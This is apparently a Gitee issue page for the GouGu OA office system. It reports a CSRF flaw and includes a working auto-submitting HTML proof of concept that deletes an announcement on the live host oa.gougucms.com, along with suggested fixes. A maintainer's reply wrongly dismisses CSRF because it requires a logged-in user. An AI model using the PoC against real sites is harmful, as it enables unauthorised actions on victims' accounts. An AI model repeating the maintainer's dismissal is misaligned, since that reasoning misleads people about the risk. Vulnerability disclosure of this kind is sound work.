304 Star 2.3K Fork 721

勾股开源 / 勾股OA办公系统

 / 详情

系统存在CSRF隐患

已关闭
创建于  
2023-05-18 12:55

漏洞原因

当前系统存在CSRF隐患,即在部分操作中没有使用CSRF token或其他防御手段,导致存在钓鱼攻击的风险。

漏洞测试

我仅测试了企业公告/公告列表处的删除操作


利用该请求报文构造攻击网页,本地示例网址http://burpsuite/show/3/g0903m6unorjreo90ozohdvqjze7gy9s:

<html>
  <!-- CSRF PoC -->
  <body>
    <form action="https://oa.gougucms.com/note/index/delete" method="POST">
      <input type="hidden" name="id" value="96" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

在有该功能权限的用户点击该恶意网址后,若浏览器已登录后台即可触发漏洞:
输入图片说明

修复建议

我虽然只测试了该功能点,但大概率系统并没有针对CSRF的安全设计,其他更敏感的功能点也很可能存在漏洞
建议增加CSRF token,或者修改跨域设置SameSite为Lax(防御POST类型的CSRF)

测试单位:山东大学网络空间安全学院

评论 (1)

针对反馈的漏洞有个建议:
OA系统都是需要登录以后才能操作数据的,才能进行数据更新的。除非是绕过了登录提交数据成功,否则有些所谓的漏洞数据都是在泄露了账号的情况下,才得以提交的。如果是账号泄露了,而篡改数据情况,这样的所谓的安全漏洞就没必要太在乎了吧,就好像你的电脑开机密码泄露了,不去改密码,却整天在研究黑客攻击你?用你的电脑账号,登录你的电脑,明着攻击你?

建议在未登录的情况下测试,如果确实存在所谓的漏洞问题的再提交。谢谢!

勾股技术 任务状态待办的 修改为已取消

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
PHP
1
https://gitee.com/gouguopen/office.git
git@gitee.com:gouguopen/office.git
gouguopen
office
勾股OA办公系统

搜索帮助